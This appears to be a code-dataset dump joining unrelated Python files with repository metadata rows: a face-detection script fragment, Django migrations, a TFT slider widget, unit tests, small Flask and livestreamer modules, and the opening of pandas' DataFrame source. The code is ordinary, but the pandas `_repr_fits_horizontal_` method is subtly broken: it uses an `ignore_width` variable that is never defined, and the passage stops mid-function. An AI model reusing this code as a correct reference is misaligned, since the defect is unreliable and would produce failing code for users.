    facedetect = cv2.CascadeClassifier(classifier_path)

    # Requested capture resolution.
    res_w = 800
    res_h = 600
    cap = cv2.VideoCapture(video_path)
    cap.set(3, res_w)   # property 3 = frame width
    cap.set(4, res_h)   # property 4 = frame height

    while cap.isOpened():
        ret, frame = cap.read()
        if not ret:
            # End of stream or decode failure.  The original code ignored
            # `ret` and crashed in cvtColor when frame was None.
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        faces = facedetect.detectMultiScale(gray, 1.3, 5)
        for (fx, fy, fw, fh) in faces:
            # Red color box over Face (fx/fy/fw/fh avoid shadowing the
            # resolution variables, unlike the original x/y/w/h).
            cv2.rectangle(frame, (fx, fy), (fx + fw, fy + fh), (0, 0, 255), 2)
        cv2.imshow('DETECTION', frame)
        if cv2.waitKey(1) == 27:  # exit on ESC
            break

    # releasing camera
    cap.release()
    # destroy window created
    cv2.destroyAllWindows()
    print('Bye...')


if __name__ == "__main__":
    print('Starting software...')
    main()
| 26.842105 | 113 | 0.555556 |
ace9721aef4b1865baac849cac82b6a0d63f37b6 | 773 | py | Python | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.6 on 2021-09-06 11:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration for the products app:
    # creates the Inventory table.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Inventory',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('price', models.DecimalField(decimal_places=2, max_digits=100)),
                ('description', models.TextField(blank=True, null=True)),
                ('department', models.CharField(max_length=100)),
                ('img', models.CharField(max_length=100)),
            ],
        ),
    ]
ace9748c1d1ace6fc2999182768eb9d7b2b189dd | 5,082 | py | Python | tft/widgets/slider.py | peterhinch/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 73 | 2016-05-11T07:45:18.000Z | 2021-12-13T13:39:04.000Z | tft/widgets/slider.py | breezecloud/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 2 | 2016-11-23T09:22:13.000Z | 2021-02-05T08:51:27.000Z | tft/widgets/slider.py | breezecloud/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 11 | 2017-09-20T06:37:23.000Z | 2021-04-24T14:29:00.000Z | # slider.py For TFT driver.
# Adapted for (and requires) uasyncio V3
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2016-2020 Peter Hinch
from tft.driver.ugui import Touchable, dolittle
from tft.driver import TFT_io
from tft.driver.constants import *
from tft.widgets.label import Label
# A slider's text items lie outside its bounding box (area sensitive to touch)
class Slider(Touchable):
    """Vertical slider widget for the TFT touch GUI.

    The slide (grab handle) travels along a slot; the widget's value is
    in [0.0, 1.0] with 0.0 at the bottom of the slot.  Optional tick
    marks and legends are drawn; legends lie outside the touch-sensitive
    bounding box.
    """

    def __init__(self, location, *, font=None, height=200, width=30, divisions=10, legends=None,
                 fgcolor=None, bgcolor=None, fontcolor=None, slidecolor=None, border=None,
                 cb_end=dolittle, cbe_args=[], cb_move=dolittle, cbm_args=[], value=0.0):
        # NOTE(review): cbe_args=[] and cbm_args=[] are mutable defaults;
        # harmless only while callbacks never mutate them -- confirm.
        width &= 0xfe # ensure divisible by 2
        super().__init__(location, font, height, width, fgcolor, bgcolor, fontcolor, border, True, None, value)
        self.divisions = divisions
        self.legends = legends if font is not None else None  # legends need a font
        self.slidecolor = slidecolor
        super()._set_callbacks(cb_move, cbm_args, cb_end, cbe_args)
        slidewidth = int(width / 1.3) & 0xfe # Ensure divisible by 2
        self.slideheight = 6 # must be divisible by 2
        # We draw an odd number of pixels:
        self.slidebytes = (self.slideheight + 1) * (slidewidth + 1) * 3
        self.slidebuf = bytearray(self.slidebytes)  # background pixels under the slide
        b = self.border
        self.pot_dimension = self.height - 2 * (b + self.slideheight // 2)  # usable slot length
        width = self.width - 2 * b
        xcentre = self.location[0] + b + width // 2
        self.slide_x0 = xcentre - slidewidth // 2
        self.slide_x1 = xcentre + slidewidth // 2 # slide X coordinates
        self.slide_y = None # Invalidate slide position
        # Prevent Label objects being added to display list when already there.
        self.drawn = False

    def show(self):
        """Draw or redraw the widget; called by the GUI framework."""
        tft = self.tft
        bw = self.border
        width = self.width - 2 * bw
        height = self.pot_dimension # Height of slot
        x = self.location[0] + bw
        y = self.location[1] + bw + self.slideheight // 2 # Allow space above and below slot
        if self._value is None or self.redraw: # Initialising
            self.redraw = False
            self.render_slide(tft, self.bgcolor) # Erase slide if it exists
            dx = width // 2 - 2
            tft.draw_rectangle(x + dx, y, x + width - dx, y + height, self.fgcolor)
            if self.divisions > 0:
                dy = height / (self.divisions) # Tick marks
                for tick in range(self.divisions + 1):
                    ypos = int(y + dy * tick)
                    tft.draw_hline(x + 1, ypos, dx, self.fgcolor)
                    tft.draw_hline(x + 2 + width // 2, ypos, dx, self.fgcolor) # Add half slot width
            # Legends: if redrawing, they are already on the Screen's display list
            if self.legends is not None and not self.drawn:
                if len(self.legends) <= 1:
                    dy = 0
                else:
                    dy = height / (len(self.legends) -1)
                yl = y + height # Start at bottom
                fhdelta = self.font.height() / 2
                font = self.font
                for legend in self.legends:
                    loc = (x + self.width, int(yl - fhdelta))
                    Label(loc, font = font, fontcolor = self.fontcolor, value = legend)
                    yl -= dy
            self.save_background(tft)
            if self._value is None:
                self.value(self._initial_value, show = False) # Prevent recursion
        self.render_bg(tft)
        self.slide_y = self.update(tft) # Reflect new value in slider position
        self.save_background(tft)
        color = self.slidecolor if self.slidecolor is not None else self.fgcolor
        self.render_slide(tft, color)
        self.drawn = True

    def update(self, tft):
        # Map the current value linearly onto the slot: value 0.0 is the
        # bottom of the slot, 1.0 the top.  Returns the slide's top Y.
        y = self.location[1] + self.border + self.slideheight // 2
        sliderpos = int(y + self.pot_dimension - self._value * self.pot_dimension)
        return sliderpos - self.slideheight // 2

    def slide_coords(self):
        # Bounding rectangle of the slide: x0, y0, x1, y1.
        return self.slide_x0, self.slide_y, self.slide_x1, self.slide_y + self.slideheight

    def save_background(self, tft): # Read background under slide
        if self.slide_y is not None:
            tft.setXY(*self.slide_coords())
            # 0x2e is the display controller's memory-read command.
            TFT_io.tft_read_cmd_data_AS(0x2e, self.slidebuf, self.slidebytes)

    def render_bg(self, tft):
        # Restore the previously saved background (erases the slide).
        if self.slide_y is not None:
            tft.setXY(*self.slide_coords())
            TFT_io.tft_write_data_AS(self.slidebuf, self.slidebytes)

    def render_slide(self, tft, color):
        # Paint the slide at its current position.
        if self.slide_y is not None:
            tft.fill_rectangle(*self.slide_coords(), color = color)

    def color(self, color):
        # Change the foreground color and redraw if it actually changed.
        if color != self.fgcolor:
            self.fgcolor = color
            self.redraw = True
            self.show_if_current()

    def _touched(self, x, y): # Touched in bounding box. A drag will call repeatedly.
        # Convert the touch Y coordinate into a 0..1 value.
        self.value((self.location[1] + self.height - y) / self.pot_dimension)
ace974d264467d429440113d368e8c235d8b4fe3 | 1,088 | py | Python | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-10-25 18:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated: links Customer one-to-one with the auth user model
    # and adjusts the Reservation return-leg foreign keys (city1/station1).

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('accounts', '0003_car_image'),
    ]

    operations = [
        migrations.AddField(
            model_name='customer',
            name='user',
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='reservation',
            name='city1',
            field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='return_city', to='accounts.city'),
        ),
        migrations.AlterField(
            model_name='reservation',
            name='station1',
            field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='return_station', to='accounts.station'),
        ),
    ]
| 34 | 147 | 0.650735 |
ace974dc6f7303ba1f6295c3f15108a2b48b2eae | 1,943 | py | Python | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | """
Test for filip.models.units
"""
from unittest import TestCase
from filip.models.ngsi_v2.units import \
Unit, \
Units, \
UnitCode, \
UnitText, \
load_units
class TestUnitCodes(TestCase):
    """Validate filip's unit models against the bundled unit table."""

    def setUp(self):
        # Unit table; iterated with .iterrows() below and exposing
        # CommonCode and Name columns.
        self.units_data = load_units()
        self.units = Units()
        # One known-good unit used by the model / validator tests.
        self.unit = {"code": "C58",
                     "name": "newton second per metre"}

    def test_unit_code(self):
        """
        test unit code model: every CommonCode must validate as a UnitCode

        Returns:
            None
        """
        for index, row in self.units_data.iterrows():
            UnitCode(value=row.CommonCode)

    def test_unit_text(self):
        """
        test unit text/name model: every Name must validate as a UnitText

        Returns:
            None
        """
        for index, row in self.units_data.iterrows():
            UnitText(value=row.Name)

    def test_unit_model(self):
        """
        Test unit model: a Unit must survive a JSON round trip unchanged

        Returns:
            None
        """
        unit = Unit(**self.unit)
        unit_from_json = Unit.parse_raw(unit.json(by_alias=True))
        self.assertEqual(unit, unit_from_json)

    def test_units(self):
        """
        Test units api: keys/names/codes must mirror the unit table

        Returns:
            None
        """
        units = Units()
        self.assertEqual(self.units_data.Name.to_list(), units.keys())
        self.assertEqual(self.units_data.Name.to_list(), units.names)
        self.assertEqual(self.units_data.CommonCode.to_list(),
                         units.keys(by_code=True))
        self.assertEqual(self.units_data.CommonCode.to_list(), units.codes)
        # Smoke-test JSON serialisation of every unit.
        for unit in units.values():
            cmdout = unit.json(indent=2)
            # print(cmdout)

    def test_unit_validator(self):
        """
        Test if unit hints are given for typos

        Returns:
            None
        """
        unit_data = self.unit.copy()
        unit_data['name'] = "celcius"  # deliberate typo must be rejected
        with self.assertRaises(ValueError):
            Unit(**unit_data)
| 25.233766 | 75 | 0.549151 |
ace974f23c418653707f35d7e21a2a72d8ca9776 | 166 | py | Python | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | from flask import Blueprint
bp = Blueprint('api', __name__)
from app.api import (
users, errors, tokens, categories, brands,
products, orders
)
| 18.444444 | 50 | 0.656627 |
ace975247a7aeb3da51a9bd6ef17c72b4286311c | 369 | py | Python | src/livestreamer/options.py | jaccarmac/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 3,614 | 2015-01-01T08:07:27.000Z | 2022-03-20T00:31:07.000Z | src/livestreamer/options.py | kviktor/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 1,028 | 2015-01-02T03:38:38.000Z | 2021-08-06T16:17:48.000Z | src/livestreamer/options.py | kviktor/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 795 | 2015-01-02T06:12:04.000Z | 2022-03-27T23:41:53.000Z | class Options(object):
def __init__(self, defaults=None):
if not defaults:
defaults = {}
self.defaults = defaults
self.options = defaults.copy()
def set(self, key, value):
self.options[key] = value
def get(self, key):
if key in self.options:
return self.options[key]
__all__ = ["Options"]
| 21.705882 | 38 | 0.571816 |
ace975385ce32196d5bfd47c6adb5063e8fbdcfc | 275,877 | py | Python | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | """
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
from __future__ import division
# pylint: disable=E1101,E1103
# pylint: disable=W0212,W0231,W0703,W0622
import functools
import collections
import itertools
import sys
import types
import warnings
from textwrap import dedent
import numpy as np
import numpy.ma as ma
from pandas.core.accessor import CachedAccessor
from pandas.core.dtypes.cast import (
maybe_upcast,
cast_scalar_to_array,
maybe_cast_to_datetime,
maybe_infer_to_datetimelike,
maybe_convert_platform,
maybe_downcast_to_dtype,
invalidate_string_dtypes,
coerce_to_dtypes,
maybe_upcast_putmask,
find_common_type)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_object_dtype,
is_extension_type,
is_extension_array_dtype,
is_datetimetz,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_bool_dtype,
is_integer_dtype,
is_float_dtype,
is_integer,
is_scalar,
is_dtype_equal,
needs_i8_conversion,
_get_dtype_from_object,
_ensure_float,
_ensure_float64,
_ensure_int64,
_ensure_platform_int,
is_list_like,
is_nested_list_like,
is_iterator,
is_sequence,
is_named_tuple)
from pandas.core.dtypes.concat import _get_sliced_frame_result_type
from pandas.core.dtypes.missing import isna, notna
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (Index, MultiIndex, _ensure_index,
_ensure_index_from_sequences)
from pandas.core.indexing import (maybe_droplevels, convert_to_index_sliceable,
check_bool_indexer)
from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks)
from pandas.core.series import Series
from pandas.core.arrays import Categorical, ExtensionArray
import pandas.core.algorithms as algorithms
from pandas.compat import (range, map, zip, lrange, lmap, lzip, StringIO, u,
OrderedDict, raise_with_traceback)
from pandas import compat
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Appender, Substitution,
rewrite_axis_style_signature)
from pandas.util._validators import (validate_bool_kwarg,
validate_axis_style_args)
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
import pandas.core.common as com
import pandas.core.nanops as nanops
import pandas.core.ops as ops
import pandas.io.formats.console as console
import pandas.io.formats.format as fmt
from pandas.io.formats.printing import pprint_thing
import pandas.plotting._core as gfx
from pandas._libs import lib, algos as libalgos
from pandas.core.config import get_option
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes='index, columns', klass='DataFrame',
axes_single_arg="{0 or 'index', 1 or 'columns'}",
axis="""
axis : {0 or 'index', 1 or 'columns'}, default 0
- 0 or 'index': apply function to each column.
- 1 or 'columns': apply function to each row.""",
optional_by="""
by : str or list of str
Name or list of names to sort by.
- if `axis` is 0 or `'index'` then `by` may contain index
levels and/or column labels
- if `axis` is 1 or `'columns'` then `by` may contain column
levels and/or index labels
.. versionchanged:: 0.23.0
Allow specifying index or column level names.""",
versionadded_to_excel='',
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame objects by performing a database-style join operation by
columns or indexes.
If joining columns on columns, the DataFrame indexes *will be
ignored*. Otherwise if joining indexes on indexes or indexes on a column or
columns, the index will be passed on.
Parameters
----------%s
right : DataFrame
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : boolean, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels
right_index : boolean, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index
sort : boolean, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword)
suffixes : 2-length sequence (tuple, list, ...)
Suffix to apply to overlapping column names in the left and right
side, respectively
copy : boolean, default True
If False, do not copy data unnecessarily
indicator : boolean or string, default False
If True, adds a column to output DataFrame called "_merge" with
information on the source of each row.
If string, column with information on source of each row will be added to
output DataFrame, and column will be named value of string.
Information column is Categorical-type and takes on a value of "left_only"
for observations whose merge key only appears in 'left' DataFrame,
"right_only" for observations whose merge key only appears in 'right'
DataFrame, and "both" if the observation's merge key is found in both.
validate : string, default None
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
.. versionadded:: 0.21.0
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Examples
--------
>>> A >>> B
lkey value rkey value
0 foo 1 0 foo 5
1 bar 2 1 bar 6
2 baz 3 2 qux 7
3 foo 4 3 bar 8
>>> A.merge(B, left_on='lkey', right_on='rkey', how='outer')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 4 foo 5
2 bar 2 bar 6
3 bar 2 bar 8
4 baz 3 NaN NaN
5 NaN NaN qux 7
Returns
-------
merged : DataFrame
The output type will the be same as 'left', if it is a subclass
of DataFrame.
See also
--------
merge_ordered
merge_asof
DataFrame.join
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
""" Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure.
Parameters
----------
data : numpy ndarray (structured or homogeneous), dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.random.randint(low=0, high=10, size=(5, 5)),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df2
a b c d e
0 2 8 8 3 4
1 4 2 9 0 9
2 1 0 7 8 0
3 5 1 7 1 3
4 6 0 2 4 2
See also
--------
DataFrame.from_records : constructor from tuples, also record arrays
DataFrame.from_dict : from dicts of Series, arrays, or dicts
DataFrame.from_items : from sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard
"""
    @property
    def _constructor(self):
        # Class used by internal machinery to build results of the same
        # dimensionality as ``self`` (subclasses inherit this hook).
        return DataFrame
_constructor_sliced = Series
_deprecations = NDFrame._deprecations | frozenset(
['sortlevel', 'get_value', 'set_value', 'from_csv', 'from_items'])
    @property
    def _constructor_expanddim(self):
        # Class used when expanding dimensionality (DataFrame -> Panel).
        # Imported lazily to avoid a circular import with pandas.core.panel.
        from pandas.core.panel import Panel
        return Panel
    def __init__(self, data=None, index=None, columns=None, dtype=None,
                 copy=False):
        # Dispatch on the type of ``data`` to build a BlockManager; every
        # construction path funnels into NDFrame.__init__ at the end.
        if data is None:
            data = {}
        if dtype is not None:
            dtype = self._validate_dtype(dtype)
        if isinstance(data, DataFrame):
            # unwrap to the underlying BlockManager
            data = data._data
        if isinstance(data, BlockManager):
            mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
                                 dtype=dtype, copy=copy)
        elif isinstance(data, dict):
            mgr = self._init_dict(data, index, columns, dtype=dtype)
        elif isinstance(data, ma.MaskedArray):
            import numpy.ma.mrecords as mrecords
            # masked recarray
            if isinstance(data, mrecords.MaskedRecords):
                mgr = _masked_rec_array_to_mgr(data, index, columns, dtype,
                                               copy)
            # a masked array
            else:
                mask = ma.getmaskarray(data)
                if mask.any():
                    # upcast so masked slots can hold the fill value
                    data, fill_value = maybe_upcast(data, copy=True)
                    data[mask] = fill_value
                else:
                    data = data.copy()
                mgr = self._init_ndarray(data, index, columns, dtype=dtype,
                                         copy=copy)
        elif isinstance(data, (np.ndarray, Series, Index)):
            if data.dtype.names:
                # structured ndarray: each named field becomes a column
                data_columns = list(data.dtype.names)
                data = {k: data[k] for k in data_columns}
                if columns is None:
                    columns = data_columns
                mgr = self._init_dict(data, index, columns, dtype=dtype)
            elif getattr(data, 'name', None) is not None:
                # named Series/Index: a single column keyed by its name
                mgr = self._init_dict({data.name: data}, index, columns,
                                      dtype=dtype)
            else:
                mgr = self._init_ndarray(data, index, columns, dtype=dtype,
                                         copy=copy)
        elif isinstance(data, (list, types.GeneratorType)):
            if isinstance(data, types.GeneratorType):
                data = list(data)
            if len(data) > 0:
                if is_list_like(data[0]) and getattr(data[0], 'ndim', 1) == 1:
                    # list of 1-d row-like records; namedtuples additionally
                    # contribute their field names as default column labels
                    if is_named_tuple(data[0]) and columns is None:
                        columns = data[0]._fields
                    arrays, columns = _to_arrays(data, columns, dtype=dtype)
                    columns = _ensure_index(columns)
                    # set the index
                    if index is None:
                        if isinstance(data[0], Series):
                            index = _get_names_from_index(data)
                        elif isinstance(data[0], Categorical):
                            index = com._default_index(len(data[0]))
                        else:
                            index = com._default_index(len(data))
                    mgr = _arrays_to_mgr(arrays, columns, index, columns,
                                         dtype=dtype)
                else:
                    mgr = self._init_ndarray(data, index, columns, dtype=dtype,
                                             copy=copy)
            else:
                # empty list: behave like an empty dict
                mgr = self._init_dict({}, index, columns, dtype=dtype)
        elif isinstance(data, collections.Iterator):
            raise TypeError("data argument can't be an iterator")
        else:
            # last resort: let numpy try to interpret ``data``
            try:
                arr = np.array(data, dtype=dtype, copy=copy)
            except (ValueError, TypeError) as e:
                exc = TypeError('DataFrame constructor called with '
                                'incompatible data and dtype: %s' % e)
                raise_with_traceback(exc)
            if arr.ndim == 0 and index is not None and columns is not None:
                # scalar plus both axes: broadcast to the full shape
                values = cast_scalar_to_array((len(index), len(columns)),
                                              data, dtype=dtype)
                mgr = self._init_ndarray(values, index, columns,
                                         dtype=values.dtype, copy=False)
            else:
                raise ValueError('DataFrame constructor not properly called!')
        NDFrame.__init__(self, mgr, fastpath=True)
    def _init_dict(self, data, index, columns, dtype=None):
        """
        Segregate Series based on type and coerce into matrices.
        Needs to handle a lot of exceptional cases.

        Returns a BlockManager built from the dict's values.
        """
        if columns is not None:
            columns = _ensure_index(columns)
            # GH10856
            # raise ValueError if only scalars in dict
            if index is None:
                extract_index(list(data.values()))
            # prefilter if columns passed
            data = {k: v for k, v in compat.iteritems(data) if k in columns}
            if index is None:
                index = extract_index(list(data.values()))
            else:
                index = _ensure_index(index)
            arrays = []
            data_names = []
            for k in columns:
                if k not in data:
                    # requested column missing from the dict: synthesize an
                    # all-NaN column of the appropriate dtype
                    # no obvious "empty" int column
                    if dtype is not None and issubclass(dtype.type,
                                                        np.integer):
                        continue
                    if dtype is None:
                        # 1783
                        v = np.empty(len(index), dtype=object)
                    elif np.issubdtype(dtype, np.flexible):
                        v = np.empty(len(index), dtype=object)
                    else:
                        v = np.empty(len(index), dtype=dtype)
                    v.fill(np.nan)
                else:
                    v = data[k]
                data_names.append(k)
                arrays.append(v)
        else:
            # no columns given: take the dict's own keys (insertion order
            # on Python >= 3.6, sorted otherwise — see the helper)
            keys = com._dict_keys_to_ordered_list(data)
            columns = data_names = Index(keys)
            arrays = [data[k] for k in keys]
        return _arrays_to_mgr(arrays, data_names, index, columns, dtype=dtype)
    def _init_ndarray(self, values, index, columns, dtype=None, copy=False):
        # Build a BlockManager from array-like ``values``.
        # input must be a ndarray, list, Series, index
        if isinstance(values, Series):
            if columns is None:
                if values.name is not None:
                    columns = [values.name]
            if index is None:
                index = values.index
            else:
                values = values.reindex(index)
            # zero len case (GH #2234)
            if not len(values) and columns is not None and len(columns):
                values = np.empty((0, 1), dtype=object)
        # helper to create the axes as indexes
        # (captures index/columns as defaults at definition time)
        def _get_axes(N, K, index=index, columns=columns):
            # return axes or defaults
            if index is None:
                index = com._default_index(N)
            else:
                index = _ensure_index(index)
            if columns is None:
                columns = com._default_index(K)
            else:
                columns = _ensure_index(columns)
            return index, columns
        # we could have a categorical type passed or coerced to 'category'
        # recast this to an _arrays_to_mgr
        if (is_categorical_dtype(getattr(values, 'dtype', None)) or
                is_categorical_dtype(dtype)):
            if not hasattr(values, 'dtype'):
                values = _prep_ndarray(values, copy=copy)
                values = values.ravel()
            elif copy:
                values = values.copy()
            index, columns = _get_axes(len(values), 1)
            return _arrays_to_mgr([values], columns, index, columns,
                                  dtype=dtype)
        elif (is_datetimetz(values) or is_extension_array_dtype(values)):
            # GH19157
            if columns is None:
                columns = [0]
            return _arrays_to_mgr([values], columns, index, columns,
                                  dtype=dtype)
        # by definition an array here
        # the dtypes will be coerced to a single dtype
        values = _prep_ndarray(values, copy=copy)
        if dtype is not None:
            if not is_dtype_equal(values.dtype, dtype):
                try:
                    values = values.astype(dtype)
                except Exception as orig:
                    e = ValueError("failed to cast to '%s' (Exception was: %s)"
                                   % (dtype, orig))
                    raise_with_traceback(e)
        index, columns = _get_axes(*values.shape)
        # blocks are stored column-major, so transpose the row-major input
        values = values.T
        # if we don't have a dtype specified, then try to convert objects
        # on the entire block; this is to convert if we have datetimelike's
        # embedded in an object type
        if dtype is None and is_object_dtype(values):
            values = maybe_infer_to_datetimelike(values)
        return create_block_manager_from_blocks([values], [columns, index])
@property
def axes(self):
"""
Return a list representing the axes of the DataFrame.
It has the row axis labels and column axis labels as the only members.
They are returned in that order.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.axes
[RangeIndex(start=0, stop=2, step=1), Index(['coll', 'col2'],
dtype='object')]
"""
return [self.index, self.columns]
@property
def shape(self):
"""
Return a tuple representing the dimensionality of the DataFrame.
See Also
--------
ndarray.shape
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.shape
(2, 2)
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4],
... 'col3': [5, 6]})
>>> df.shape
(2, 3)
"""
return len(self.index), len(self.columns)
def _repr_fits_vertical_(self):
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
    def _repr_fits_horizontal_(self):
        """
        Check if full repr fits in horizontal boundaries imposed by the display
        options width and max_columns. In case of non-interactive session, no
        boundaries apply.
        ignore_width is here so ipython+HTML output can behave the way
        users expect. display.max_columns remains in effect.
        GH3541, GH3573
        """
        width, height = console.get_console_size()
        max_columns = get_option("display.max_columns")
        nb_columns = len(self.columns)
        # exceed max columns
        if ((max_columns and nb_columns > max_columns) or
                ((not ignore_width) and width and nb_columns > (width // 2))):
            return False
        # used by repr_html under IPython notebook or scripts ignore terminal
        # dims
        if ignore_width or not com.in_interactive_session():
            return True
        if (get_option('display.width') is not None or
                com.in_ipython_frontend()):
            # check at least the column row for excessive width
            max_rows = 1
        else:
            max_rows = get_option("display.max_rows")
        # when auto-detecting, so width=None and not in ipython front end
